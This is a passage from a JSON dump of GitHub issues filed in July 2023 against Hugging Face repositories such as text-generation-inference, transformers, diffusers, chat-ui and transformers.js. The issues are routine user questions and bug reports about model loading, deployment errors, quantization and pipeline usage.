NVIDIA_VISIBLE_DEVICES=1 -p 8080:80 ghcr.io/huggingface/text-generation-inference:0.9.3 --model-id decapoda-research/llama-7b-hf\r\n```\r\n\r\nAt this moment, with netstat, I could see in host, 8080 port is already listened.\r\ntcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN\r\n\r\nand with\r\n\r\n```\r\ncurl 127.0.0.1:8080/generate \\\r\n -X POST \\\r\n -d '{\"inputs\":\"What is Deep Learning?\",\"parameters\":{\"max_new_tokens\":20}}' \\\r\n -H 'Content-Type: application/json'\r\n```\r\n\r\n\r\nBut I get connect refuse.\r\nIs there some debugging method to check what goes wrong for this bug?\r\n\r\nThx\r\n\r\n", "url": "https://github.com/huggingface/text-generation-inference/issues/711", "state": "closed", "labels": [], "created_at": "2023-07-27T13:59:48Z", "updated_at": "2023-07-27T14:10:46Z", "user": "leiwen83" }, { "repo": "huggingface/transformers", "number": 25138, "title": "How to return detected language using whisper with asr pipeline?", "body": "### System Info\n\n- `transformers` version: 4.31.0\r\n- Platform: Linux-5.15.0-67-generic-x86_64-with-glibc2.31\r\n- Python version: 3.10.12\r\n- Huggingface_hub version: 0.16.4\r\n- Safetensors version: 0.3.1\r\n- Accelerate version: not installed\r\n- Accelerate config: not found\r\n- PyTorch version (GPU?): 2.0.1 (False)\r\n- Tensorflow version (GPU?): 2.11.0 (False)\r\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\r\n- Jax version: not installed\r\n- JaxLib version: not installed\r\n- Using GPU in script?: No\r\n- Using distributed or parallel set-up in script?: No\n\n### Who can help?\n\n@sanchit-gandhi, @Narsil\n\n### Information\n\n- [ ] The official example scripts\n- [X] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [X] My own task or dataset (give details below)\n\n### Reproduction\n\nHello,\r\n\r\nI'm trying to use asr pipeline with whisper, in other to detect an audio language and transcribe it. I get the transcribed audio successfully, but I have not found a way to return the detected language too.\r\nI search the GitHub issues, and it seems this was added by [#21427](https://github.com/huggingface/transformers/pull/21427), but I don't know how to return the detected language. Here is my code:\r\n```\r\nfrom transformers import pipeline\r\nimport torch\r\n\r\nspeech_file = \"input.mp3\"\r\ndevice = \"cuda:0\" if torch.cuda.is_available() else \"cpu\"\r\n\r\nwhisper = pipeline(\"automatic-speech-recognition\", max_new_tokens=448, model=\"openai/whisper-small\", device=device)\r\nwhisper_result = whisper(speech_file)\r\nprint(whisper_result)\r\n```\n\n### Expected behavior\n\nBe able to return detected language.", "url": "https://github.com/huggingface/transformers/issues/25138", "state": "closed", "labels": [], "created_at": "2023-07-27T10:51:31Z", "updated_at": "2025-02-11T11:24:49Z", "user": "arso1er" }, { "repo": "huggingface/text-generation-inference", "number": 703, "title": "Is there an example how to quantize a model (e.g. meta-llama/Llama-2-7b-chat-hf) using the prebuilt docker image (e.g. ghcr.io/huggingface/text-generation-inference:0.9.3)", "body": "### System Info\r\n\r\n0.9.3\r\n\r\n### Information\r\n\r\n- [ ] Docker\r\n- [ ] The CLI directly\r\n\r\n### Tasks\r\n\r\n- [ ] An officially supported command\r\n- [ ] My own modifications\r\n\r\n### Reproduction\r\n\r\nNA\r\n\r\n### Expected behavior\r\n\r\nA command to quantize a model (e.g. meta-llama/Llama-2-7b-chat-hf) using the prebuilt docker image (e.g. ghcr.io/huggingface/text-generation-inference:0.9.3)\r\n\r\nAfter quantization, the model should be able to be loaded with `text-generation-inference --quantize gptq`", "url": "https://github.com/huggingface/text-generation-inference/issues/703", "state": "closed", "labels": [], "created_at": "2023-07-27T01:08:54Z", "updated_at": "2023-07-28T21:41:46Z", "user": "taoari" }, { "repo": "huggingface/sentence-transformers", "number": 2262, "title": "How to pass more than sentence pairs to InputExamples for fine-tuning?", "body": "I have more information about each data point such as language and contextual data that could potentially help (maybe) for our task. The task is to generate sentence similarity embedding and labels. \r\n\r\nFor the time being, I was able to expand the input examples code to get these features in to expand the input. \r\n\r\n```\r\nTrain_data = [\u2018sentence1\u2019,\u2019sentence2\u2019,\u2019textcategory1\u2019,\u2019label\u2019]\r\n\r\nTrain_examples =[InputExample(texts=[x[0],x[1],x[2]],label=x[3]) for x in Train_data]\r\n```\r\n\r\nSince the `textcategory1` gets encoded as well at the end of the input example in the form of `sentence1[0];sentence2[0];textcategory1[0]` separated by ;.\r\n\r\n1. How does this impact the overall input for a model since it doesnt just see a sentence pair but more? \r\n2. Does the fine-tuning layer see the two sentences as pairs or it sees as a single input and a label?\r\n3. Even though it works, if this is not the correct way how do I include the sense of tokens for the fine-tuning? I.e. use textcategory1 as or feature without messing with the embedding. ", "url": "https://github.com/huggingface/sentence-transformers/issues/2262", "state": "open", "labels": [], "created_at": "2023-07-26T18:29:54Z", "updated_at": "2023-07-30T15:39:24Z", "user": "cyriltw" }, { "repo": "huggingface/trl", "number": 578, "title": "How to load a trained reward model? Different (random) results each time the model is loaded.", "body": "I trained a reward model using QLoRA and now I want to load it. I followed the instructions from this example from peft:\r\nhttps://github.com/huggingface/peft/blob/main/examples/sequence_classification/LoRA.ipynb\r\nThis leads me to the following code:\r\n```\r\nimport torch\r\nfrom peft import PeftModel, PeftConfig\r\nfrom transformers import AutoModelForSequenceClassification, AutoTokenizer\r\n\r\npeft_model_id = \"vincentmin/llama-2-7b-reward-oasst1\"\r\nconfig = PeftConfig.from_pretrained(peft_model_id)\r\nmodel = AutoModelForSequenceClassification.from_pretrained(\r\n config.base_model_name_or_path,\r\n num_labels=1,\r\n load_in_8bit=True,\r\n torch_dtype=torch.float16,\r\n)\r\nmodel = PeftModel.from_pretrained(model, peft_model_id)\r\ntokenizer = AutoTokenizer.from_pretrained(config.base_model_name_or_path, use_auth_token=True)\r\nmodel.eval()\r\nwith torch.no_grad():\r\n reward = model(**tokenizer(\"hello world\", return_tensors='pt')).logits\r\nreward\r\n```\r\nIf I run this code twice in a row, including loading the model again, I get different results for `reward`. The model output should be deterministic. If I just calculate the reward with the same loaded model, the result is deterministic. Hence, I'm concluding that there are randomly initialised weights that are not correctly loaded with `PeftModel.from_pretrained`. If I try to test the model on the test data, I'm getting random (close to 50% accuracy) results, while the model reached accuracies of >70% during training.\r\n\r\nI trained the model using an adaptation of https://github.com/lvwerra/trl/blob/main/examples/scripts/reward_trainer.py. The resulting configuration is here https://huggingface.co/vincentmin/llama-2-7b-reward-oasst1/blob/main/adapter_config.json.\r\n\r\nHow are we advised to push and load our finetuned reward models to get deterministic results? I think the community would benefit from a documented example as a companion to `reward_trainer.py`.", "url": "https://github.com/huggingface/trl/issues/578", "state": "closed", "labels": [], "created_at": "2023-07-26T15:02:13Z", "updated_at": "2023-07-26T19:00:10Z", "user": "vincentmin" }, { "repo": "huggingface/datasets", "number": 6078, "title": "resume_download with streaming=True", "body": "### Describe the bug\n\nI used:\r\n```\r\ndataset = load_dataset(\r\n \"oscar-corpus/OSCAR-2201\",\r\n token=True,\r\n language=\"fr\",\r\n streaming=True,\r\n split=\"train\"\r\n)\r\n```\r\nUnfortunately, the server had a problem during the training process. I saved the step my training stopped at.\r\nBut how can I resume download from step 1_000_\u00b4000 without re-streaming all the first 1 million docs of the dataset?\r\n\r\n`download_config=DownloadConfig(resume_download=True)` seems to not work with streaming=True.\n\n### Steps to reproduce the bug\n\n```\r\nfrom datasets import load_dataset, DownloadConfig\r\ndataset = load_dataset(\r\n \"oscar-corpus/OSCAR-2201\",\r\n token=True,\r\n language=\"fr\",\r\n streaming=True, # optional\r\n split=\"train\",\r\n download_config=DownloadConfig(resume_download=True)\r\n)\r\n# interupt the run and try to relaunch it => this restart from scratch\r\n```\n\n### Expected behavior\n\nI would expect a parameter to start streaming from a given index in the dataset.\n\n### Environment info\n\n- `datasets` version: 2.14.0\r\n- Platform: Linux-5.19.0-45-generic-x86_64-with-glibc2.29\r\n- Python version: 3.8.10\r\n- Huggingface_hub version: 0.15.1\r\n- PyArrow version: 12.0.1\r\n- Pandas version: 2.0.0", "url": "https://github.com/huggingface/datasets/issues/6078", "state": "closed", "labels": [], "created_at": "2023-07-26T14:08:22Z", "updated_at": "2023-07-28T11:05:03Z", "comments": 3, "user": "NicolasMICAUX" }, { "repo": "huggingface/diffusers", "number": 4281, "title": "how o convert trained LoRA bin format file to A111 safetensor format", "body": "### Describe the bug\r\n\r\nI find script convert_lora_safetensor_to_diffusers.py,but it seems like convert safetensors to bin,not bin to safetensors,I try run this script,error like this:\r\n\u256d\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 Traceback (most recent call last) \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u256e\r\n\u2502 C:\\Users\\fut\\Desktop\\tinaniu\\convert_lora_safetensor_to_diffusers.py:125 in \u2502\r\n\u2502 \u2502\r\n\u2502 122 \u2502 lora_prefix_text_encoder = args.lora_prefix_text_encoder \u2502\r\n\u2502 123 \u2502 alpha = args.alpha \u2502\r\n\u2502 124 \u2502 \u2502\r\n\u2502 \u2771 125 \u2502 pipe = convert(base_model_path, checkpoint_path, lora_prefix_unet, lora_prefix_text_ \u2502\r\n\u2502 126 \u2502 \u2502\r\n\u2502 127 \u2502 pipe = pipe.to(args.device) \u2502\r\n\u2502 128 \u2502 pipe.save_pretrained(args.dump_path, safe_serialization=args.to_safetensors) \u2502\r\n\u2502 \u2502\r\n\u2502 C:\\Users\\fut\\Desktop\\tinaniu\\convert_lora_safetensor_to_diffusers.py:31 in convert \u2502\r\n\u2502 \u2502\r\n\u2502 28 \u2502 pipeline = StableDiffusionPipeline.from_pretrained(base_model_path, torch_dtype=torc \u2502\r\n\u2502 29 \u2502 \u2502\r\n\u2502 30 \u2502 # load LoRA weight from .safetensors \u2502\r\n\u2502 \u2771 31 \u2502 state_dict = load_file(checkpoint_path) \u2502\r\n\u2502 32 \u2502 \u2502\r\n\u2502 33 \u2502 visited = [] \u2502\r\n\u2502 34 \u2502\r\n\u2502 \u2502\r\n\u2502 D:\\anaconda3\\lib\\site-packages\\safetensors\\torch.py:259 in load_file \u2502\r\n\u2502 \u2502\r\n\u2502 256 \u2502 ``` \u2502\r\n\u2502 257 \u2502 \"\"\" \u2502\r\n\u2502 258 \u2502 result = {} \u2502\r\n\u2502 \u2771 259 \u2502 with safe_open(filename, framework=\"pt\", device=device) as f: \u2502\r\n\u2502 260 \u2502 \u2502 for k in f.keys(): \u2502\r\n\u2502 261 \u2502 \u2502 \u2502 result[k] = f.get_tensor(k) \u2502\r\n\u2502 262 \u2502 return result \u2502\r\n\u2570\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u256f\r\nSafetensorError: Error while deserializing header: HeaderTooLarge\r\n\r\n\r\n### Reproduction\r\n\r\nSafetensorError: Error while deserializing header: HeaderTooLarge\r\n\r\n### Logs\r\n\r\n_No response_\r\n\r\n### System Info\r\n\r\ndiffusers==0.18.2\r\n\r\n### Who can help?\r\n\r\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/4281", "state": "closed", "labels": [ "bug", "stale" ], "created_at": "2023-07-26T08:16:48Z", "updated_at": "2023-09-04T15:03:46Z", "user": "futureflsl" }, { "repo": "huggingface/llm-vscode", "number": 50, "title": "the vsix doesn't work?,how to fix it", "body": "i download the vsix from https://marketplace.visualstudio.com/items?itemName=HuggingFace.huggingface-vscode&ssr=false#version-history\uff0cbut in vscode when i installed it ,it doesn't work \u3002could you fix this?", "url": "https://github.com/huggingface/llm-vscode/issues/50", "state": "closed", "labels": [], "created_at": "2023-07-26T07:05:17Z", "updated_at": "2023-10-17T14:34:58Z", "user": "CuteBadEgg" }, { "repo": "huggingface/transformers.js", "number": 216, "title": "[Question] Getting a lot of ERR 404s when running in browser.", "body": "When implementing code that accesses bart-large-mnli in the front-end part of my code, the browser console tells me every attempt to use the pipeline fails with an error 404. (at least that's what I think it's telling me)\r\n\r\nSo I am trying to use the bart-large-mnli to analyze a bunch of 'post' objects, and only display them if the text in the post relates to a selected 'interest'. \r\n\r\nHere is my javascript code to do that (checkRelevance.js):\r\n```\r\nimport { pipeline } from \"@xenova/transformers\";\r\n\r\nexport default async function checkTweet(text, interest) {\r\n try {\r\n console.log(\r\n `checking tweet...\\ntext:${text.substring(\r\n 0,\r\n 10\r\n )}...\\ninterest:${interest}`\r\n );\r\n let pipe = await pipeline(\r\n \"zero-shot-classification\",\r\n \"Xenova/bart-large-mnli\",\r\n { quantized: false }\r\n );\r\n // console.log(\"await out...\");\r\n let out = await pipe(text, interest);\r\n console.log(out);\r\n\r\n const relevant = out.scores[0] >= 0.5;\r\n console.log(out.scores[0]);\r\n return relevant;\r\n } catch (error) {\r\n console.log(error);\r\n }\r\n}\r\n```\r\nAnd here is how it is implemented in the front end Feed.jsx:\r\n\r\n```\r\nuseEffect(() => {\r\n setFilteredPosts(posts.map(post => {\r\n checkTweet(post.text, selectedInterest).then(result => {\r\n if (result) {\r\n return post\r\n }\r\n }\r\n )\r\n }))\r\n }, [selectedInterest]);\r\n\r\n// ...\r\n\r\nfilteredPosts.map((post) => (\r\n ) \r\n\r\n```\r\n\r\nNow when I run checkRelevance.js on it's own with a small test, it accesses the api just fine, but when it's implemented in the browser I get this:\r\n\"Screen\r\n\r\nand then this:\r\n\"Screen\r\n\r\nI'm not asking you to debug all my code lol, just wondering if there's something extra that needs doing for running it in the browser. If you need to see more lmk. Thanks!\r\n", "url": "https://github.com/huggingface/transformers.js/issues/216", "state": "closed", "labels": [ "question" ], "created_at": "2023-07-26T00:42:20Z", "updated_at": "2023-08-20T23:43:04Z", "user": "eklavyaisabird" }, { "repo": "huggingface/transformers.js", "number": 215, "title": "[Question] How to use a sharp buffer as input to \"image-classification\" pipeline ?", "body": "hi,\r\ni am looking to use a sharp buffer as an input to \"image-classification\" pipeline, it seems that only url can be provided as an input, i am using the model in nodejs environment (backend) , can anyone provide a solution to this.\r\n\r\nthanks\r\n", "url": "https://github.com/huggingface/transformers.js/issues/215", "state": "closed", "labels": [ "question" ], "created_at": "2023-07-25T21:10:06Z", "updated_at": "2023-07-25T21:42:18Z", "user": "geminigeek" }, { "repo": "huggingface/chat-ui", "number": 368, "title": "Ability to pass in request headers for model endpoints", "body": "Hello.\r\n\r\nI am trying to add an AWS Sagemaker model endpoint to chat-ui and I am getting stuck on the authorization part because I can't pass in request headers to the endpoint. I am able to pass in the authorization string but then I get the following error:\r\n\r\n```\r\nCould not parse last message {\"message\":\"Authorization header requires existence of either a 'X-Amz-Date' or a 'Date' header. Authorization=AWS4-HMAC-SHA256 Credential=, Signature=\"}\r\nSyntaxError: Unexpected end of JSON input\r\n at JSON.parse ()\r\n at parseGeneratedText (/src/routes/conversation/[id]/+server.ts:196:32)\r\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5)\r\n at async saveMessage (/src/routes/conversation/[id]/+server.ts:107:26)\r\n```\r\n\r\nIs it possible to add the ability to pass in headers to the model endpoints in the `.env.local` file?", "url": "https://github.com/huggingface/chat-ui/issues/368", "state": "closed", "labels": [], "created_at": "2023-07-25T20:12:28Z", "updated_at": "2023-08-18T15:26:41Z", "comments": 3, "user": "lotif" }, { "repo": "huggingface/autotrain-advanced", "number": 161, "title": "How to save every X steps on cli?", "body": "You could set --save_strategy steps, but how do you specify the number of steps so that the model is saved every X steps?\r\n\r\nMy command:\r\n```\r\nautotrain llm --train --project_name project --model ./llama/llama_models/7B-hf --data_path . --use_peft --use_int4 --learning_rate 2e-4 --train_batch_size 12 --num_train_epochs 1 --trainer sft --save_strategy steps --save_total_limit 1\r\n```", "url": "https://github.com/huggingface/autotrain-advanced/issues/161", "state": "closed", "labels": [], "created_at": "2023-07-25T16:10:22Z", "updated_at": "2023-12-18T15:29:08Z", "user": "astarostap" }, { "repo": "huggingface/setfit", "number": 400, "title": "From which number of training samples does it not make sense anymore to use SetFit?", "body": "I'm building a classifier that assigns news articles to one of 8 categories, I was wondering if there was a rule of thumb that over a certain number of training samples per class it would make more sense to use a traditional transformer classifier such as roberta-large? Or will SetFit always be more accurate?\r\n\r\n\r\n ", "url": "https://github.com/huggingface/setfit/issues/400", "state": "open", "labels": [ "question" ], "created_at": "2023-07-25T06:56:04Z", "updated_at": "2023-08-01T14:13:48Z", "user": "lbelpaire" }, { "repo": "huggingface/diffusers", "number": 4234, "title": "How to train instruct-pix2pix with controlnet and inference", "body": "Hi guys,\r\nI want to train instruct-pix2pix using controlnet condition. As you know, currently available for [instruct-pix2pix](https://huggingface.co/docs/diffusers/training/instructpix2pix) and [control net](https://huggingface.co/docs/diffusers/training/controlnet) separately. \r\n**Q1)** Have you plan about this problem for implementation?\r\n**Q2)** How I can merge them and add controlnet into instruct-pix2pix?\r\n**Q3)** Suppose this issue is done, I want to do start training, In your opinion, If we use controlnet pretraining network, and freeze that network and I want to train only instruct-pix2pix model, Is it common way to do?", "url": "https://github.com/huggingface/diffusers/issues/4234", "state": "closed", "labels": [ "stale" ], "created_at": "2023-07-24T13:47:02Z", "updated_at": "2023-08-31T15:04:14Z", "user": "mzeynali" }, { "repo": "huggingface/chat-ui", "number": 366, "title": "v0.4.0 Not on GitHub", "body": "The hosted version is already at v0.4.0. This is at least not reflected in the tags or releases here. Is there other non public code?", "url": "https://github.com/huggingface/chat-ui/issues/366", "state": "closed", "labels": [], "created_at": "2023-07-24T11:35:38Z", "updated_at": "2023-07-24T13:19:30Z", "comments": 2, "user": "claell" }, { "repo": "huggingface/chat-ui", "number": 364, "title": "Facing Error 403 after deployment", "body": "Hi folks!\r\nMy Chat-UI setup along with a custom LangChain model works perfect on localhost. I tried to deploy it on an Azure VM with Docker Containers and I have been facing this issue which might be due to MongoDB.\r\n\r\n![image](https://github.com/huggingface/chat-ui/assets/39643649/82b75337-7e99-4347-82ab-1ab4a1a38f93)\r\n\r\n Any help is appreciated. Thank you", "url": "https://github.com/huggingface/chat-ui/issues/364", "state": "closed", "labels": [ "back", "support" ], "created_at": "2023-07-24T10:57:53Z", "updated_at": "2024-04-25T16:29:38Z", "comments": 13, "user": "awsum0225" }, { "repo": "huggingface/chat-ui", "number": 363, "title": "When starting with build files, it becomes impossible to change the model.", "body": "When starting with pm2 following the Docker file's instructions, I encounter an issue where I cannot change the model. Specifically, after clicking on \"Current Model,\" a popup to select the model appears, but even after selecting \"Apply,\" no changes are observed. Upon inspecting the developer tools, I noticed a 403 Error for http://localhost:3000/settings. This problem occurs both when hosting the software on a Docker container and when deploying it directly.\r\n![image](https://github.com/huggingface/chat-ui/assets/7141702/ed16edd1-ebe5-4b1f-b47e-c6be1c380ccf)\r\n\r\nAlso, I have confirmed that this error does not occur when using `npm run dev` or `npm run preview`. Therefore, I suspect that this issue may be related to pm2. If someone has any hints or insights that could help resolve this problem, I would greatly appreciate comments.\r\n\r\nMy environment is as follows:\r\nOS: Windows 10 + WSL 2 (Ubuntu 20.04)\r\nNode Version: 18.15.0\r\nCommit ID: 569bde33470b075bf1365af2cb03a1b31b875379\r\n", "url": "https://github.com/huggingface/chat-ui/issues/363", "state": "closed", "labels": [ "bug", "support" ], "created_at": "2023-07-24T08:30:03Z", "updated_at": "2023-10-16T16:07:25Z", "comments": 4, "user": "suzuki-shm" }, { "repo": "huggingface/diffusers", "number": 4222, "title": "How to train ldm on a low-resolution image dataset (128*128)", "body": "**Is your feature request related to a problem? Please describe.**\r\nA clear and concise description of what the problem is. Ex. I'm always frustrated when [...]\r\n\r\n**Describe the solution you'd like**\r\nA clear and concise description of what you want to happen.\r\n\r\n**Describe alternatives you've considered**\r\nA clear and concise description of any alternative solutions or features you've considered.\r\n\r\n**Additional context**\r\nAdd any other context or screenshots about the feature request here.\r\n", "url": "https://github.com/huggingface/diffusers/issues/4222", "state": "closed", "labels": [ "stale" ], "created_at": "2023-07-24T03:14:20Z", "updated_at": "2023-08-31T15:04:25Z", "user": "crowningwang" }, { "repo": "huggingface/text-generation-inference", "number": 679, "title": "How to load a model from a given path?", "body": "### System Info\n\ntgi version:0.9.0\n\n### Information\n\n- [X] Docker\n- [ ] The CLI directly\n\n### Tasks\n\n- [ ] An officially supported command\n- [ ] My own modifications\n\n### Reproduction\n\nI just want to use tgi to run llama-7b model to get the throughput on A100. The model files are preloaded in a given path. I followed the readme and found the following error. \r\n\r\n**Is theres any option for load model from a path?** Thanks~\r\n\r\n```shell\r\nme@ubuntu20-02:~/zy$ docker run --gpus all --shm-size 1g -p 8080:80 -v ~/w/data:/data ghcr.io/huggingface/text-generation-inference:0.9.2 --model-id /shared/models/huggingface/llama-7B-hf/ \r\n2023-07-23T14:17:02.797888Z INFO text_generation_launcher: Args { model_id: \"/shared/models/huggingface/LLM/llama-7B-hf/\", revision: None, validation_workers: 2, sharded: None, num_shard: None, quantize: None, dtype: None, trust_remote_code: false, max_concurrent_requests: 128, max_best_of: 2, max_stop_sequences: 4, max_input_length: 1024, max_total_tokens: 2048, waiting_served_ratio: 1.2, max_batch_prefill_tokens: 4096, max_batch_total_tokens: 16000, max_waiting_tokens: 20, hostname: \"1401cbf60306\", port: 80, shard_uds_path: \"/tmp/text-generation-server\", master_addr: \"localhost\", master_port: 29500, huggingface_hub_cache: Some(\"/data\"), weights_cache_override: None, disable_custom_kernels: false, json_output: false, otlp_endpoint: None, cors_allow_origin: [], watermark_gamma: None, watermark_delta: None, ngrok: false, ngrok_authtoken: None, ngrok_domain: None, ngrok_username: None, ngrok_password: None, env: false }\r\n2023-07-23T14:17:02.798147Z INFO text_generation_launcher: Starting download process.\r\n2023-07-23T14:17:08.906356Z ERROR text_generation_launcher: Download encountered an error: Traceback (most recent call last):\r\n\r\n File \"/opt/conda/bin/text-generation-server\", line 8, in \r\n sys.exit(app())\r\n\r\n File \"/opt/conda/lib/python3.9/site-packages/text_generation_server/cli.py\", line 109, in download_weights\r\n utils.weight_files(model_id, revision, extension)\r\n\r\n File \"/opt/conda/lib/python3.9/site-packages/text_generation_server/utils/hub.py\", line 96, in weight_files\r\n filenames = weight_hub_files(model_id, revision, extension)\r\n\r\n File \"/opt/conda/lib/python3.9/site-packages/text_generation_server/utils/hub.py\", line 25, in weight_hub_files\r\n info = api.model_info(model_id, revision=revision)\r\n\r\n File \"/opt/conda/lib/python3.9/site-packages/huggingface_hub/utils/_validators.py\", line 112, in _inner_fn\r\n validate_repo_id(arg_value)\r\n\r\n File \"/opt/conda/lib/python3.9/site-packages/huggingface_hub/utils/_validators.py\", line 160, in validate_repo_id\r\n raise HFValidationError(\r\n\r\nhuggingface_hub.utils._validators.HFValidationError: Repo id must be in the form 'repo_name' or 'namespace/repo_name': '/bigdata/shared/models/huggingface/LLM/llama-7B-hf/'. Use `repo_type` argument if needed.\r\n\r\n\r\nError: DownloadError\r\n```\n\n### Expected behavior\n\noutput the running log.", "url": "https://github.com/huggingface/text-generation-inference/issues/679", "state": "closed", "labels": [], "created_at": "2023-07-23T06:35:16Z", "updated_at": "2023-07-24T01:34:10Z", "user": "zhaoyang-star" }, { "repo": "huggingface/controlnet_aux", "number": 67, "title": "Please I want to know how to install", "body": "Hello, I am new to this and I want to know how to install this particular package. I have installed other packages, but this one I do not know how. Please help with this.\r\n", "url": "https://github.com/huggingface/controlnet_aux/issues/67", "state": "open", "labels": [], "created_at": "2023-07-22T18:57:33Z", "updated_at": "2023-07-26T01:03:21Z", "user": "sohaib19922" }, { "repo": "huggingface/diffusers", "number": 4210, "title": "How to use \"attention_mask\" in \"forward\" function of \"UNet2DConditionModel\" defined in \"diffusers/src/diffusers/models /unet_2d_condition.py\"?", "body": "### Describe the bug\n\nHow to use the \"attention_mask\" in UNet2DConditionModel? What should the size of \"attention_mask\" look like? \r\n\r\nAnd \"attention_mask\" can not be used when opening \"enable_xformers_memory_efficient_attention\" in \"examples/text_to_image/train_text_to_image.py\"? \r\n\r\n` File \"/usr/local/lib/python3.9/dist-packages/diffusers/models/unet_2d_blocks.py\", line 970, in custom_forward\r\n return module(*inputs, return_dict=return_dict)\r\n File \"/usr/local/lib/python3.9/dist-packages/torch/nn/modules/module.py\", line 1501, in _call_impl\r\n return forward_call(*args, **kwargs)\r\n File \"/usr/local/lib/python3.9/dist-packages/diffusers/models/transformer_2d.py\", line 291, in forward\r\n hidden_states = block(\r\n File \"/usr/local/lib/python3.9/dist-packages/torch/nn/modules/module.py\", line 1501, in _call_impl\r\n return forward_call(*args, **kwargs)\r\n File \"/usr/local/lib/python3.9/dist-packages/diffusers/models/attention.py\", line 154, in forward\r\n attn_output = self.attn1(\r\n File \"/usr/local/lib/python3.9/dist-packages/torch/nn/modules/module.py\", line 1501, in _call_impl\r\n return forward_call(*args, **kwargs)\r\n File \"/usr/local/lib/python3.9/dist-packages/diffusers/models/attention_processor.py\", line 321, in forward\r\n return self.processor(\r\n File \"/usr/local/lib/python3.9/dist-packages/diffusers/models/attention_processor.py\", line 1027, in __call__\r\n attention_mask = attention_mask.expand(-1, query_tokens, -1)\r\n\r\nRuntimeError: expand(torch.cuda.HalfTensor{[80, 1, 6144, 6144]}, size=[-1, 6144, -1]): the number of sizes provided (3) must be greater or equal to the number of dimensions in the tensor (4)`\n\n### Reproduction\n\nNone\n\n### Logs\n\n_No response_\n\n### System Info\n\n- `diffusers` version: 0.19.0.dev0\r\n- Platform: Linux-5.4.143.bsk.7-amd64-x86_64-with-glibc2.31\r\n- Python version: 3.9.2\r\n- PyTorch version (GPU?): 2.0.1+cu117 (True)\r\n- Huggingface_hub version: 0.16.4\r\n- Transformers version: 4.30.2\r\n- Accelerate version: 0.21.0\r\n- xFormers version: 0.0.20\r\n- Using GPU in script?: \r\n- Using distributed or parallel set-up in script?: \n\n### Who can help?\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/4210", "state": "closed", "labels": [ "bug", "stale" ], "created_at": "2023-07-22T17:28:56Z", "updated_at": "2024-10-18T16:34:37Z", "user": "ZihaoW123" }, { "repo": "huggingface/accelerate", "number": 1758, "title": "How to use c10 backend for fault tolerance", "body": "Hi,\r\n\r\nI found little to no documentation on how to use c10 backend for fault tolerance with accelerate. PyTorch seems to be having this:\r\nhttps://pytorch.org/docs/stable/elastic/rendezvous.html\r\n\r\nI am looking for fault tolerance in case of crash in few nodes, which also means adjusting batch size dynamically to account for nodes that are down.\r\n\r\nThanks in advance.", "url": "https://github.com/huggingface/accelerate/issues/1758", "state": "closed", "labels": [], "created_at": "2023-07-22T08:26:33Z", "updated_at": "2023-08-29T15:06:00Z", "user": "geekyGoku" }, { "repo": "huggingface/autotrain-advanced", "number": 155, "title": "How to do inference via autotrain-advanced?", "body": "I see an option to do inference autotrain llm --help. \r\n1. Can you share command to do inference on say llama2 model ? How do you pass lora files to do inference?\r\n2. Any option to do merge and unload while saving the model locally?\r\n3. Any option for multi-gpu training with single node - specify local rank?", "url": "https://github.com/huggingface/autotrain-advanced/issues/155", "state": "closed", "labels": [], "created_at": "2023-07-22T05:55:25Z", "updated_at": "2023-12-15T00:14:28Z", "user": "sujithjoseph" }, { "repo": "huggingface/transformers.js", "number": 206, "title": "[Question] Output always equal to Input in text-generation", "body": "I tried a different types of input and always get the output equals the input... What I'm missing?\r\n\r\n```\r\nconst answerer = await pipeline('text-generation', 'Xenova/LaMini-Cerebras-590M');\r\n\r\nlet zica = await answerer(`Based on this history:\r\nAndr\u00e9 de Mattos Ferraz is an engineering manager in Rio de Janeiro, Brazil. He has worked in systems development in the oil sector, working in several areas of the oil/gas life cycle: Exploration, Reservoir, and Production. He also worked on data science projects for predicting failures of water injection pumps, forecasting water filter saturation (SRU), and analyzing vibrations.\r\n\r\nWhat are Andr\u00e9 tech skills?`);\r\nconsole.log(zica)\r\n```\r\n\r\n![image](https://github.com/xenova/transformers.js/assets/139378356/f35b3c9a-fdcc-4258-ac0d-0a2e8de83877)\r\n", "url": "https://github.com/huggingface/transformers.js/issues/206", "state": "closed", "labels": [ "question" ], "created_at": "2023-07-21T21:18:02Z", "updated_at": "2023-07-22T02:21:05Z", "user": "AndreEneva" }, { "repo": "huggingface/transformers.js", "number": 205, "title": "[Question] Is transformers.js expected to work with react native?", "body": "I've naively been trying to run the transformers js library via react native on android.\r\nNote that onnxruntime-react-native explicitly supports react native, however the transformers.js package depends only on onnxruntime-web and onnruntime-node.\r\nImporting the transformers.js works fine, however as I try to load a model, I receive the error `import.meta` is currently unsupported from `transformers.js`.\r\n\r\nIt would be super convenient to be able to use pipes directly without needing to interface without onnxruntine-react-native directly! If not supported yet, what would need to be done?", "url": "https://github.com/huggingface/transformers.js/issues/205", "state": "closed", "labels": [ "question" ], "created_at": "2023-07-21T20:55:44Z", "updated_at": "2023-07-21T21:35:35Z", "user": "Wehzie" }, { "repo": "huggingface/setfit", "number": 398, "title": "hyperparameters to control how to handle long documents", "body": "It's common that one might want to use setfit for classifying documents that are longer than 